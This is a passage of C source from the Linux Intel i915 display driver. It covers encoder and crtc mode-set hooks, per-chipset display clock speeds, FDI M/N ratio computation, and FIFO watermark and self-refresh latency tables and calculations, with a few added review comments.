 * the mode set. */
static void ironlake_crtc_prepare(struct drm_crtc *crtc)
{
	ironlake_crtc_disable(crtc);
}
/* Commit hook for Ironlake-class crtcs: re-enable after a mode set. */
static void ironlake_crtc_commit(struct drm_crtc *crtc)
{
	ironlake_crtc_enable(crtc);
}
/* Generic encoder prepare hook: power the encoder down before a mode
 * set via its dpms helper. */
void intel_encoder_prepare (struct drm_encoder *encoder)
{
	struct drm_encoder_helper_funcs *encoder_funcs = encoder->helper_private;
	/* lvds has its own version of prepare see intel_lvds_prepare */
	encoder_funcs->dpms(encoder, DRM_MODE_DPMS_OFF);
}
/* Generic encoder commit hook: power the encoder back up after a mode
 * set via its dpms helper. */
void intel_encoder_commit (struct drm_encoder *encoder)
{
	struct drm_encoder_helper_funcs *encoder_funcs = encoder->helper_private;
	/* lvds has its own version of commit see intel_lvds_commit */
	encoder_funcs->dpms(encoder, DRM_MODE_DPMS_ON);
}
/* Common destroy hook: tear down the drm encoder and free the
 * containing intel_encoder allocation. */
void intel_encoder_destroy(struct drm_encoder *encoder)
{
	struct intel_encoder *intel_encoder = to_intel_encoder(encoder);

	drm_encoder_cleanup(encoder);
	kfree(intel_encoder);
}
/* Validate/massage @mode before a mode set. Rejects modes whose dot
 * clock exceeds what the fixed 2.7GHz FDI link can carry on PCH-split
 * platforms, and fills in crtc timing fields when no encoder did. */
static bool intel_crtc_mode_fixup(struct drm_crtc *crtc,
				  struct drm_display_mode *mode,
				  struct drm_display_mode *adjusted_mode)
{
	struct drm_device *dev = crtc->dev;

	/* FDI link clock is fixed at 2.7G */
	if (HAS_PCH_SPLIT(dev) &&
	    mode->clock * 3 > IRONLAKE_FDI_FREQ * 4)
		return false;

	/* XXX some encoders set the crtcinfo, others don't.
	 * Obviously we need some form of conflict resolution here...
	 */
	if (adjusted_mode->crtc_htotal == 0)
		drm_mode_set_crtcinfo(adjusted_mode, 0);

	return true;
}
/* Core display clock for i945-class hardware, in kHz (fixed 400MHz). */
static int i945_get_display_clock_speed(struct drm_device *dev)
{
	return 400000;
}
/* Core display clock for i915-class hardware, in kHz (fixed 333MHz). */
static int i915_get_display_clock_speed(struct drm_device *dev)
{
	return 333000;
}
/* Core display clock for remaining i9xx variants, in kHz (200MHz). */
static int i9xx_misc_get_display_clock_speed(struct drm_device *dev)
{
	return 200000;
}
/* Core display clock for i915GM, in kHz, read from the GCFGC config
 * register: 133MHz in low-frequency mode, otherwise 333MHz or the
 * 190/200MHz default depending on the display clock field. */
static int i915gm_get_display_clock_speed(struct drm_device *dev)
{
	u16 gcfgc = 0;

	pci_read_config_word(dev->pdev, GCFGC, &gcfgc);

	if (gcfgc & GC_LOW_FREQUENCY_ENABLE)
		return 133000;

	switch (gcfgc & GC_DISPLAY_CLOCK_MASK) {
	case GC_DISPLAY_CLOCK_333_MHZ:
		return 333000;
	default:
	case GC_DISPLAY_CLOCK_190_200_MHZ:
		return 190000;
	}
}
/* Core display clock for i865, in kHz (fixed 266MHz). */
static int i865_get_display_clock_speed(struct drm_device *dev)
{
	return 266000;
}
/* Core display clock for i855, in kHz, nominally decoded from the HPLLCC
 * clock-control field. */
static int i855_get_display_clock_speed(struct drm_device *dev)
{
	/* NOTE(review): hpllcc is never read from hardware here -- it stays
	 * at its 0 initializer, so the switch always takes whichever case
	 * has value 0 (per the comment below, the high-speed assumption).
	 * Confirm whether the config-space read was dropped intentionally. */
	u16 hpllcc = 0;

	/* Assume that the hardware is in the high speed state.  This
	 * should be the default.
	 */
	switch (hpllcc & GC_CLOCK_CONTROL_MASK) {
	case GC_CLOCK_133_200:
	case GC_CLOCK_100_200:
		return 200000;
	case GC_CLOCK_166_250:
		return 250000;
	case GC_CLOCK_100_133:
		return 133000;
	}

	/* Shouldn't happen */
	return 0;
}
/* Core display clock for i830, in kHz (fixed 133MHz). */
static int i830_get_display_clock_speed(struct drm_device *dev)
{
	return 133000;
}
/* FDI link M/N divider values, programmed into the pipe data/link
 * M1/N1 registers to relate pixel clock to link clock. */
struct fdi_m_n {
	u32        tu;      /* transfer unit size */
	u32        gmch_m;  /* data M: bits_per_pixel * pixel clock */
	u32        gmch_n;  /* data N: link clock * lanes * 8 */
	u32        link_m;  /* link M: pixel clock */
	u32        link_n;  /* link N: link clock */
};
/* Scale the ratio *num/*den down (halving both terms) until each value
 * fits in the 24-bit M/N register fields. */
static void
fdi_reduce_ratio(u32 *num, u32 *den)
{
	u32 m = *num;
	u32 n = *den;

	while (m > 0xffffff || n > 0xffffff) {
		m >>= 1;
		n >>= 1;
	}

	*num = m;
	*den = n;
}
/* Compute the FDI data and link M/N values for the given pixel format,
 * lane count, pixel clock and link clock, reducing each ratio to fit
 * the 24-bit register fields. Results are stored in @m_n. */
static void
ironlake_compute_m_n(int bits_per_pixel, int nlanes, int pixel_clock,
		     int link_clock, struct fdi_m_n *m_n)
{
	m_n->tu = 64; /* default size */

	/* BUG_ON(pixel_clock > INT_MAX / 36); */
	m_n->gmch_m = bits_per_pixel * pixel_clock;
	m_n->gmch_n = link_clock * nlanes * 8;
	fdi_reduce_ratio(&m_n->gmch_m, &m_n->gmch_n);

	m_n->link_m = pixel_clock;
	m_n->link_n = link_clock;
	fdi_reduce_ratio(&m_n->link_m, &m_n->link_n);
}
/* Per-platform FIFO/watermark parameters consumed by
 * intel_calculate_wm(). All sizes are in cachelines. */
struct intel_watermark_params {
	unsigned long fifo_size;      /* total FIFO size */
	unsigned long max_wm;         /* highest programmable watermark */
	unsigned long default_wm;     /* fallback when computed wm <= 0 */
	unsigned long guard_size;     /* safety margin added to entries */
	unsigned long cacheline_size; /* bytes per FIFO cacheline */
};
/* Pineview has different values for various configs */
static const struct intel_watermark_params pineview_display_wm = {
PINEVIEW_DISPLAY_FIFO,
PINEVIEW_MAX_WM,
PINEVIEW_DFT_WM,
PINEVIEW_GUARD_WM,
PINEVIEW_FIFO_LINE_SIZE
};
static const struct intel_watermark_params pineview_display_hplloff_wm = {
PINEVIEW_DISPLAY_FIFO,
PINEVIEW_MAX_WM,
PINEVIEW_DFT_HPLLOFF_WM,
PINEVIEW_GUARD_WM,
PINEVIEW_FIFO_LINE_SIZE
};
static const struct intel_watermark_params pineview_cursor_wm = {
PINEVIEW_CURSOR_FIFO,
PINEVIEW_CURSOR_MAX_WM,
PINEVIEW_CURSOR_DFT_WM,
PINEVIEW_CURSOR_GUARD_WM,
PINEVIEW_FIFO_LINE_SIZE,
};
static const struct intel_watermark_params pineview_cursor_hplloff_wm = {
PINEVIEW_CURSOR_FIFO,
PINEVIEW_CURSOR_MAX_WM,
PINEVIEW_CURSOR_DFT_WM,
PINEVIEW_CURSOR_GUARD_WM,
PINEVIEW_FIFO_LINE_SIZE
};
static const struct intel_watermark_params g4x_wm_info = {
G4X_FIFO_SIZE,
G4X_MAX_WM,
G4X_MAX_WM,
2,
G4X_FIFO_LINE_SIZE,
};
static const struct intel_watermark_params g4x_cursor_wm_info = {
I965_CURSOR_FIFO,
I965_CURSOR_MAX_WM,
I965_CURSOR_DFT_WM,
2,
G4X_FIFO_LINE_SIZE,
};
static const struct intel_watermark_params i965_cursor_wm_info = {
I965_CURSOR_FIFO,
I965_CURSOR_MAX_WM,
I965_CURSOR_DFT_WM,
2,
I915_FIFO_LINE_SIZE,
};
static const struct intel_watermark_params i945_wm_info = {
I945_FIFO_SIZE,
I915_MAX_WM,
1,
2,
I915_FIFO_LINE_SIZE
};
static const struct intel_watermark_params i915_wm_info = {
I915_FIFO_SIZE,
I915_MAX_WM,
1,
2,
I915_FIFO_LINE_SIZE
};
static const struct intel_watermark_params i855_wm_info = {
I855GM_FIFO_SIZE,
I915_MAX_WM,
1,
2,
I830_FIFO_LINE_SIZE
};
static const struct intel_watermark_params i830_wm_info = {
I830_FIFO_SIZE,
I915_MAX_WM,
1,
2,
I830_FIFO_LINE_SIZE
};
static const struct intel_watermark_params ironlake_display_wm_info = {
ILK_DISPLAY_FIFO,
ILK_DISPLAY_MAXWM,
ILK_DISPLAY_DFTWM,
2,
ILK_FIFO_LINE_SIZE
};
static const struct intel_watermark_params ironlake_cursor_wm_info = {
ILK_CURSOR_FIFO,
ILK_CURSOR_MAXWM,
ILK_CURSOR_DFTWM,
2,
ILK_FIFO_LINE_SIZE
};
static const struct intel_watermark_params ironlake_display_srwm_info = {
ILK_DISPLAY_SR_FIFO,
ILK_DISPLAY_MAX_SRWM,
ILK_DISPLAY_DFT_SRWM,
2,
ILK_FIFO_LINE_SIZE
};
static const struct intel_watermark_params ironlake_cursor_srwm_info = {
ILK_CURSOR_SR_FIFO,
ILK_CURSOR_MAX_SRWM,
ILK_CURSOR_DFT_SRWM,
2,
ILK_FIFO_LINE_SIZE
};
static const struct intel_watermark_params sandybridge_display_wm_info = {
SNB_DISPLAY_FIFO,
SNB_DISPLAY_MAXWM,
SNB_DISPLAY_DFTWM,
2,
SNB_FIFO_LINE_SIZE
};
static const struct intel_watermark_params sandybridge_cursor_wm_info = {
SNB_CURSOR_FIFO,
SNB_CURSOR_MAXWM,
SNB_CURSOR_DFTWM,
2,
SNB_FIFO_LINE_SIZE
};
static const struct intel_watermark_params sandybridge_display_srwm_info = {
SNB_DISPLAY_SR_FIFO,
SNB_DISPLAY_MAX_SRWM,
SNB_DISPLAY_DFT_SRWM,
2,
SNB_FIFO_LINE_SIZE
};
static const struct intel_watermark_params sandybridge_cursor_srwm_info = {
SNB_CURSOR_SR_FIFO,
SNB_CURSOR_MAX_SRWM,
SNB_CURSOR_DFT_SRWM,
2,
SNB_FIFO_LINE_SIZE
};
/**
 * intel_calculate_wm - calculate watermark level
 * @clock_in_khz: pixel clock
 * @wm: chip FIFO params
 * @fifo_size: size of the FIFO to compute against, in cachelines
 * @pixel_size: display pixel size
 * @latency_ns: memory latency for the platform
 *
 * Calculate the watermark level (the level at which the display plane will
 * start fetching from memory again).  Each chip has a different display
 * FIFO size and allocation, so the caller needs to figure that out and pass
 * in the correct intel_watermark_params structure.
 *
 * As the pixel clock runs, the FIFO will be drained at a rate that depends
 * on the pixel size.  When it reaches the watermark level, it'll start
 * fetching FIFO line sized based chunks from memory until the FIFO fills
 * past the watermark point.  If the FIFO drains completely, a FIFO underrun
 * will occur, and a display engine hang could result.
 */
static unsigned long intel_calculate_wm(unsigned long clock_in_khz,
					const struct intel_watermark_params *wm,
					int fifo_size,
					int pixel_size,
					unsigned long latency_ns)
{
	long entries_required, wm_size;

	/*
	 * Note: we need to make sure we don't overflow for various clock &
	 * latency values.
	 * clocks go from a few thousand to several hundred thousand.
	 * latency is usually a few thousand
	 */
	entries_required = ((clock_in_khz / 1000) * pixel_size * latency_ns) /
		1000;
	entries_required = DIV_ROUND_UP(entries_required, wm->cacheline_size);

	DRM_DEBUG_KMS("FIFO entries required for mode: %ld\n", entries_required);

	/* The watermark is the free space left after worst-case drain. */
	wm_size = fifo_size - (entries_required + wm->guard_size);

	DRM_DEBUG_KMS("FIFO watermark level: %ld\n", wm_size);

	/* Don't promote wm_size to unsigned... */
	if (wm_size > (long)wm->max_wm)
		wm_size = wm->max_wm;
	if (wm_size <= 0)
		wm_size = wm->default_wm;
	return wm_size;
}
/* One row of the CxSR (self-refresh) latency lookup table; keyed by
 * platform variant and memory configuration. */
struct cxsr_latency {
	int is_desktop;                     /* 1 = desktop, 0 = mobile */
	int is_ddr3;                        /* 1 = DDR3, 0 = DDR2 */
	unsigned long fsb_freq;             /* FSB frequency, MHz */
	unsigned long mem_freq;             /* memory frequency, MHz */
	unsigned long display_sr;           /* display self-refresh latency */
	unsigned long display_hpll_disable; /* display latency w/ HPLL off */
	unsigned long cursor_sr;            /* cursor self-refresh latency */
	unsigned long cursor_hpll_disable;  /* cursor latency w/ HPLL off */
};
/* CxSR latency lookup table, searched by intel_get_cxsr_latency() on
 * (desktop/mobile, DDR2/DDR3, FSB freq, memory freq). The latency
 * values feed intel_calculate_wm()'s latency_ns parameter, so they are
 * presumably in nanoseconds -- NOTE(review): confirm units against the
 * hardware documentation. */
static const struct cxsr_latency cxsr_latency_table[] = {
	{1, 0, 800, 400, 3382, 33382, 3983, 33983},    /* DDR2-400 SC */
	{1, 0, 800, 667, 3354, 33354, 3807, 33807},    /* DDR2-667 SC */
	{1, 0, 800, 800, 3347, 33347, 3763, 33763},    /* DDR2-800 SC */
	{1, 1, 800, 667, 6420, 36420, 6873, 36873},    /* DDR3-667 SC */
	{1, 1, 800, 800, 5902, 35902, 6318, 36318},    /* DDR3-800 SC */

	{1, 0, 667, 400, 3400, 33400, 4021, 34021},    /* DDR2-400 SC */
	{1, 0, 667, 667, 3372, 33372, 3845, 33845},    /* DDR2-667 SC */
	{1, 0, 667, 800, 3386, 33386, 3822, 33822},    /* DDR2-800 SC */
	{1, 1, 667, 667, 6438, 36438, 6911, 36911},    /* DDR3-667 SC */
	{1, 1, 667, 800, 5941, 35941, 6377, 36377},    /* DDR3-800 SC */

	{1, 0, 400, 400, 3472, 33472, 4173, 34173},    /* DDR2-400 SC */
	{1, 0, 400, 667, 3443, 33443, 3996, 33996},    /* DDR2-667 SC */
	{1, 0, 400, 800, 3430, 33430, 3946, 33946},    /* DDR2-800 SC */
	{1, 1, 400, 667, 6509, 36509, 7062, 37062},    /* DDR3-667 SC */
	{1, 1, 400, 800, 5985, 35985, 6501, 36501},    /* DDR3-800 SC */

	{0, 0, 800, 400, 3438, 33438, 4065, 34065},    /* DDR2-400 SC */
	{0, 0, 800, 667, 3410, 33410, 3889, 33889},    /* DDR2-667 SC */
	{0, 0, 800, 800, 3403, 33403, 3845, 33845},    /* DDR2-800 SC */
	{0, 1, 800, 667, 6476, 36476, 6955, 36955},    /* DDR3-667 SC */
	{0, 1, 800, 800, 5958, 35958, 6400, 36400},    /* DDR3-800 SC */

	{0, 0, 667, 400, 3456, 33456, 4103, 34106},    /* DDR2-400 SC */
	{0, 0, 667, 667, 3428, 33428, 3927, 33927},    /* DDR2-667 SC */
	{0, 0, 667, 800, 3443, 33443, 3905, 33905},    /* DDR2-800 SC */
	{0, 1, 667, 667, 6494, 36494, 6993, 36993},    /* DDR3-667 SC */
	{0, 1, 667, 800, 5998, 35998, 6460, 36460},    /* DDR3-800 SC */

	{0, 0, 400, 400, 3528, 33528, 4255, 34255},    /* DDR2-400 SC */
	{0, 0, 400, 667, 3500, 33500, 4079, 34079},    /* DDR2-667 SC */
	{0, 0, 400, 800, 3487, 33487, 4029, 34029},    /* DDR2-800 SC */
	{0, 1, 400, 667, 6566, 36566, 7145, 37145},    /* DDR3-667 SC */
	{0, 1, 400, 800, 6042, 36042, 6584, 36584},    /* DDR3-800 SC */
};
/* Look up the CxSR latency entry matching the given platform variant
 * and memory configuration. Returns NULL (after a debug message) when
 * no entry matches, or when fsb/mem are unknown (zero). */
static const struct cxsr_latency *intel_get_cxsr_latency(int is_desktop,
							 int is_ddr3,
							 int fsb,
							 int mem)
{
	int i;

	if (fsb == 0 || mem == 0)
		return NULL;

	for (i = 0; i < ARRAY_SIZE(cxsr_latency_table); i++) {
		const struct cxsr_latency *entry = &cxsr_latency_table[i];

		if (entry->is_desktop == is_desktop &&
		    entry->is_ddr3 == is_ddr3 &&
		    entry->fsb_freq == fsb &&
		    entry->mem_freq == mem)
			return entry;
	}

	DRM_DEBUG_KMS("Unknown FSB/MEM found, disable CxSR\n");

	return NULL;
}
/* Turn off Pineview self-refresh (CxSR) by clearing its enable bit in
 * DSPFW3. */
static void pineview_disable_cxsr(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;

	/* deactivate cxsr */
	I915_WRITE(DSPFW3, I915_READ(DSPFW3) & ~PINEVIEW_SELF_REFRESH_EN);
}
/*
 * Latency for FIFO fetches is dependent on several factors:
 *   - memory configuration (speed, channels)
 *   - chipset
 *   - current MCH state
 * It can be fairly high in some situations, so here we assume a fairly
 * pessimal value.  It's a tradeoff between extra memory fetches (if we
 * set this value too high, the FIFO will fetch frequently to stay full)
 * and power consumption (set it too low to save power and we might see
 * FIFO underruns and display "flicker").
 *
 * A value of 5us seems to be a good balance; safe for very low end
 * platforms but not overly aggressive on lower latency configs.
 */
static const int latency_ns = 5000; /* default memory latency, nanoseconds */
/* Decode the display FIFO allocation for @plane (0 = A, nonzero = B)
 * from the DSPARB register, in cachelines. Plane B gets the span
 * between the C start and the A size. */
static int i9xx_get_fifo_size(struct drm_device *dev, int plane)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	uint32_t dsparb = I915_READ(DSPARB);
	int size = dsparb & 0x7f;

	if (plane)
		size = ((dsparb >> DSPARB_CSTART_SHIFT) & 0x7f) - size;

	DRM_DEBUG_KMS("FIFO size - (0x%08x) %s: %d\n", dsparb,
		      plane ? "B" : "A", size);

	return size;
}
/* Decode the i85x display FIFO allocation for @plane from DSPARB. The
 * register stores 512-bit units, hence the shift to cachelines. */
static int i85x_get_fifo_size(struct drm_device *dev, int plane)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	uint32_t dsparb = I915_READ(DSPARB);
	int size = dsparb & 0x1ff;

	if (plane)
		size = ((dsparb >> DSPARB_BEND_SHIFT) & 0x1ff) - size;

	size >>= 1; /* Convert to cachelines */

	DRM_DEBUG_KMS("FIFO size - (0x%08x) %s: %d\n", dsparb,
		      plane ? "B" : "A", size);

	return size;
}
/* Decode the i845 display FIFO allocation from DSPARB; a single shared
 * field regardless of @plane, converted to cachelines. */
static int i845_get_fifo_size(struct drm_device *dev, int plane)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	uint32_t dsparb = I915_READ(DSPARB);
	int size = (dsparb & 0x7f) >> 2; /* Convert to cachelines */

	DRM_DEBUG_KMS("FIFO size - (0x%08x) %s: %d\n", dsparb,
		      plane ? "B" : "A",
		      size);

	return size;
}
/* Decode the i830 display FIFO allocation from DSPARB; a single shared
 * field regardless of @plane, converted to cachelines. */
static int i830_get_fifo_size(struct drm_device *dev, int plane)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	uint32_t dsparb = I915_READ(DSPARB);
	int size = (dsparb & 0x7f) >> 1; /* Convert to cachelines */

	DRM_DEBUG_KMS("FIFO size - (0x%08x) %s: %d\n", dsparb,
		      plane ? "B" : "A", size);

	return size;
}
/* Return the sole enabled crtc with a framebuffer, or NULL when none or
 * more than one is active (self-refresh needs exactly one). */
static struct drm_crtc *single_enabled_crtc(struct drm_device *dev)
{
	struct drm_crtc *candidate, *found = NULL;

	list_for_each_entry(candidate, &dev->mode_config.crtc_list, head) {
		if (!candidate->enabled || !candidate->fb)
			continue;

		if (found != NULL)
			return NULL; /* second active crtc: not "single" */

		found = candidate;
	}

	return found;
}
/* Recompute and program Pineview self-refresh watermarks (display,
 * cursor, and their HPLL-off variants), enabling CxSR only when exactly
 * one crtc is active and a latency entry exists for this memory
 * configuration. */
static void pineview_update_wm(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct drm_crtc *crtc;
	const struct cxsr_latency *latency;
	u32 reg;
	unsigned long wm;

	latency = intel_get_cxsr_latency(IS_PINEVIEW_G(dev), dev_priv->is_ddr3,
					 dev_priv->fsb_freq, dev_priv->mem_freq);
	if (!latency) {
		DRM_DEBUG_KMS("Unknown FSB/MEM found, disable CxSR\n");
		pineview_disable_cxsr(dev);
		return;
	}

	crtc = single_enabled_crtc(dev);
	if (crtc) {
		int clock = crtc->mode.clock;
		int pixel_size = crtc->fb->bits_per_pixel / 8;

		/* Display SR */
		wm = intel_calculate_wm(clock, &pineview_display_wm,
					pineview_display_wm.fifo_size,
					pixel_size, latency->display_sr);
		reg = I915_READ(DSPFW1);
		reg &= ~DSPFW_SR_MASK;
		reg |= wm << DSPFW_SR_SHIFT;
		I915_WRITE(DSPFW1, reg);
		DRM_DEBUG_KMS("DSPFW1 register is %x\n", reg);

		/* cursor SR */
		/* NOTE(review): the cursor computations below pass the
		 * DISPLAY tables' fifo_size rather than the cursor
		 * tables' -- confirm whether that is intentional. */
		wm = intel_calculate_wm(clock, &pineview_cursor_wm,
					pineview_display_wm.fifo_size,
					pixel_size, latency->cursor_sr);
		reg = I915_READ(DSPFW3);
		reg &= ~DSPFW_CURSOR_SR_MASK;
		reg |= (wm & 0x3f) << DSPFW_CURSOR_SR_SHIFT;
		I915_WRITE(DSPFW3, reg);

		/* Display HPLL off SR */
		wm = intel_calculate_wm(clock, &pineview_display_hplloff_wm,
					pineview_display_hplloff_wm.fifo_size,
					pixel_size, latency->display_hpll_disable);
		reg = I915_READ(DSPFW3);
		reg &= ~DSPFW_HPLL_SR_MASK;
		reg |= wm & DSPFW_HPLL_SR_MASK;
		I915_WRITE(DSPFW3, reg);

		/* cursor HPLL off SR */
		wm = intel_calculate_wm(clock, &pineview_cursor_hplloff_wm,
					pineview_display_hplloff_wm.fifo_size,
					pixel_size, latency->cursor_hpll_disable);
		reg = I915_READ(DSPFW3);
		reg &= ~DSPFW_HPLL_CURSOR_MASK;
		reg |= (wm & 0x3f) << DSPFW_HPLL_CURSOR_SHIFT;
		I915_WRITE(DSPFW3, reg);
		DRM_DEBUG_KMS("DSPFW3 register is %x\n", reg);

		/* activate cxsr */
		I915_WRITE(DSPFW3,
			   I915_READ(DSPFW3) | PINEVIEW_SELF_REFRESH_EN);
		DRM_DEBUG_KMS("Self-refresh is enabled\n");
	} else {
		pineview_disable_cxsr(dev);
		DRM_DEBUG_KMS("Self-refresh is disabled\n");
	}
}
/*
 * g4x_compute_wm0 - compute the WM0 (normal operation) watermarks for
 * one plane/cursor pair.
 *
 * Returns false (with the FIFO guard values stored) when the pipe is
 * disabled or has no framebuffer, true when real watermarks were
 * computed into *plane_wm / *cursor_wm.
 */
static bool g4x_compute_wm0(struct drm_device *dev,
			    int plane,
			    const struct intel_watermark_params *display,
			    int display_latency_ns,
			    const struct intel_watermark_params *cursor,
			    int cursor_latency_ns,
			    int *plane_wm,
			    int *cursor_wm)
{
	struct drm_crtc *crtc;
	int xtotal, xres, pclk, cpp;
	int us_per_line, nlines;
	int fifo_entries, tlb_extra;

	crtc = intel_get_crtc_for_plane(dev, plane);

	/* An idle pipe (or one without a framebuffer) only needs the
	 * FIFO guard values. */
	if (!crtc->enabled || crtc->fb == NULL) {
		*cursor_wm = cursor->guard_size;
		*plane_wm = display->guard_size;
		return false;
	}

	xtotal = crtc->mode.htotal;
	xres = crtc->mode.hdisplay;
	pclk = crtc->mode.clock;
	cpp = crtc->fb->bits_per_pixel / 8;

	/* Primary plane: small buffer method plus a TLB miss allowance. */
	fifo_entries = ((pclk * cpp / 1000) * display_latency_ns) / 1000;
	tlb_extra = display->fifo_size * display->cacheline_size - xres * 8;
	if (tlb_extra > 0)
		fifo_entries += tlb_extra;
	fifo_entries = DIV_ROUND_UP(fifo_entries, display->cacheline_size);
	*plane_wm = fifo_entries + display->guard_size;
	if (*plane_wm > (int)display->max_wm)
		*plane_wm = display->max_wm;

	/* Cursor: large buffer method over a fixed 64 pixel wide fetch. */
	us_per_line = (xtotal * 1000) / pclk;
	nlines = (cursor_latency_ns / us_per_line + 1000) / 1000;
	fifo_entries = nlines * 64 * cpp;
	tlb_extra = cursor->fifo_size * cursor->cacheline_size - xres * 8;
	if (tlb_extra > 0)
		fifo_entries += tlb_extra;
	fifo_entries = DIV_ROUND_UP(fifo_entries, cursor->cacheline_size);
	*cursor_wm = fifo_entries + cursor->guard_size;
	if (*cursor_wm > (int)cursor->max_wm)
		*cursor_wm = (int)cursor->max_wm;

	return true;
}
/*
* Check the wm result.
*
* If any calculated watermark values is larger than the maximum value that
* can be programmed into the associated watermark register, that watermark
* must be disabled.
*/
/*
 * g4x_check_srwm - validate computed self-refresh watermarks.
 *
 * Returns false (self-refresh must be disabled) if either value
 * exceeds what its watermark register field can hold, or if both are
 * zero (latency was 0); true when the values are programmable.
 */
static bool g4x_check_srwm(struct drm_device *dev,
			   int display_wm, int cursor_wm,
			   const struct intel_watermark_params *display,
			   const struct intel_watermark_params *cursor)
{
	DRM_DEBUG_KMS("SR watermark: display plane %d, cursor %d\n",
		      display_wm, cursor_wm);

	if (display_wm > display->max_wm) {
		DRM_DEBUG_KMS("display watermark is too large(%d/%ld), disabling\n",
			      display_wm, display->max_wm);
		return false;
	}

	if (cursor_wm > cursor->max_wm) {
		DRM_DEBUG_KMS("cursor watermark is too large(%d/%ld), disabling\n",
			      cursor_wm, cursor->max_wm);
		return false;
	}

	if (!(display_wm || cursor_wm)) {
		DRM_DEBUG_KMS("SR latency is 0, disabling\n");
		return false;
	}

	return true;
}
/*
 * g4x_compute_srwm - compute self-refresh watermarks for the given
 * plane, then validate them via g4x_check_srwm().
 *
 * Returns false when latency_ns is zero (both outputs cleared) or when
 * the computed values fail validation.
 */
static bool g4x_compute_srwm(struct drm_device *dev,
			     int plane,
			     int latency_ns,
			     const struct intel_watermark_params *display,
			     const struct intel_watermark_params *cursor,
			     int *display_wm, int *cursor_wm)
{
	struct drm_crtc *crtc;
	unsigned long us_per_line;
	int xres, xtotal, cpp, pclk;
	int nlines, line_bytes;
	int method1, method2;
	int fifo_entries;

	/* A zero latency means this SR level is unusable. */
	if (latency_ns == 0) {
		*display_wm = 0;
		*cursor_wm = 0;
		return false;
	}

	crtc = intel_get_crtc_for_plane(dev, plane);
	xres = crtc->mode.hdisplay;
	xtotal = crtc->mode.htotal;
	pclk = crtc->mode.clock;
	cpp = crtc->fb->bits_per_pixel / 8;

	us_per_line = (xtotal * 1000) / pclk;
	nlines = (latency_ns / us_per_line + 1000) / 1000;
	line_bytes = xres * cpp;

	/* Primary plane: the smaller of the two estimates wins. */
	method1 = ((pclk * cpp / 1000) * latency_ns) / 1000;
	method2 = nlines * line_bytes;
	fifo_entries = DIV_ROUND_UP(min(method1, method2),
				    display->cacheline_size);
	*display_wm = fifo_entries + display->guard_size;

	/* Cursor: a fixed 64 pixel wide fetch per line. */
	fifo_entries = DIV_ROUND_UP(nlines * cpp * 64,
				    cursor->cacheline_size);
	*cursor_wm = fifo_entries + cursor->guard_size;

	return g4x_check_srwm(dev,
			      *display_wm, *cursor_wm,
			      display, cursor);
}
/* True when exactly one pipe bit is set in the mask. */
#define single_plane_enabled(mask) is_power_of_2(mask)
/*
 * g4x_update_wm - program G4x FIFO watermarks.
 *
 * Computes WM0 for both planes, plus the self-refresh watermarks when
 * exactly one plane is enabled, then writes DSPFW1/2/3 and toggles
 * FW_BLC_SELF accordingly.
 */
static void g4x_update_wm(struct drm_device *dev)
{
	static const int sr_latency_ns = 12000;
	struct drm_i915_private *dev_priv = dev->dev_private;
	int planea_wm, planeb_wm, cursora_wm, cursorb_wm;
	int plane_sr, cursor_sr;
	unsigned int enabled = 0;

	if (g4x_compute_wm0(dev, 0,
			    &g4x_wm_info, latency_ns,
			    &g4x_cursor_wm_info, latency_ns,
			    &planea_wm, &cursora_wm))
		enabled |= 1;

	if (g4x_compute_wm0(dev, 1,
			    &g4x_wm_info, latency_ns,
			    &g4x_cursor_wm_info, latency_ns,
			    &planeb_wm, &cursorb_wm))
		enabled |= 2;

	/* Self-refresh is only attempted with a single plane enabled. */
	plane_sr = cursor_sr = 0;
	if (single_plane_enabled(enabled) &&
	    g4x_compute_srwm(dev, ffs(enabled) - 1,
			     sr_latency_ns,
			     &g4x_wm_info,
			     &g4x_cursor_wm_info,
			     &plane_sr, &cursor_sr))
		I915_WRITE(FW_BLC_SELF, FW_BLC_SELF_EN);
	else
		I915_WRITE(FW_BLC_SELF,
			   I915_READ(FW_BLC_SELF) & ~FW_BLC_SELF_EN);

	DRM_DEBUG_KMS("Setting FIFO watermarks - A: plane=%d, cursor=%d, B: plane=%d, cursor=%d, SR: plane=%d, cursor=%d\n",
		      planea_wm, cursora_wm,
		      planeb_wm, cursorb_wm,
		      plane_sr, cursor_sr);

	I915_WRITE(DSPFW1,
		   (plane_sr << DSPFW_SR_SHIFT) |
		   (cursorb_wm << DSPFW_CURSORB_SHIFT) |
		   (planeb_wm << DSPFW_PLANEB_SHIFT) |
		   planea_wm);
	I915_WRITE(DSPFW2,
		   (I915_READ(DSPFW2) & DSPFW_CURSORA_MASK) |
		   (cursora_wm << DSPFW_CURSORA_SHIFT));
	/* HPLL off in SR has some issues on G4x... disable it */
	I915_WRITE(DSPFW3,
		   (I915_READ(DSPFW3) & ~DSPFW_HPLL_SR_EN) |
		   (cursor_sr << DSPFW_CURSOR_SR_SHIFT));
}
/*
 * i965_update_wm - program 965-class FIFO watermarks.
 *
 * The normal (non-SR) watermarks are hard-wired to 8; only the
 * self-refresh display and cursor watermarks are calculated, and only
 * when a single CRTC is enabled.
 */
static void i965_update_wm(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct drm_crtc *crtc;
	int srwm = 1;
	int cursor_sr = 16;

	/* Calc sr entries for one plane configs */
	crtc = single_enabled_crtc(dev);
	if (crtc) {
		/* self-refresh has much higher latency */
		static const int sr_latency_ns = 12000;
		int clock = crtc->mode.clock;
		int htotal = crtc->mode.htotal;
		int hdisplay = crtc->mode.hdisplay;
		int pixel_size = crtc->fb->bits_per_pixel / 8;
		unsigned long line_time_us;
		int entries;

		line_time_us = ((htotal * 1000) / clock);

		/* Use ns/us then divide to preserve precision */
		entries = (((sr_latency_ns / line_time_us) + 1000) / 1000) *
			pixel_size * hdisplay;
		entries = DIV_ROUND_UP(entries, I915_FIFO_LINE_SIZE);
		srwm = I965_FIFO_SIZE - entries;
		if (srwm < 0)
			srwm = 1;
		srwm &= 0x1ff;
		DRM_DEBUG_KMS("self-refresh entries: %d, wm: %d\n",
			      entries, srwm);

		/* cursor fetches are 64 pixels wide */
		entries = (((sr_latency_ns / line_time_us) + 1000) / 1000) *
			pixel_size * 64;
		entries = DIV_ROUND_UP(entries,
				       i965_cursor_wm_info.cacheline_size);
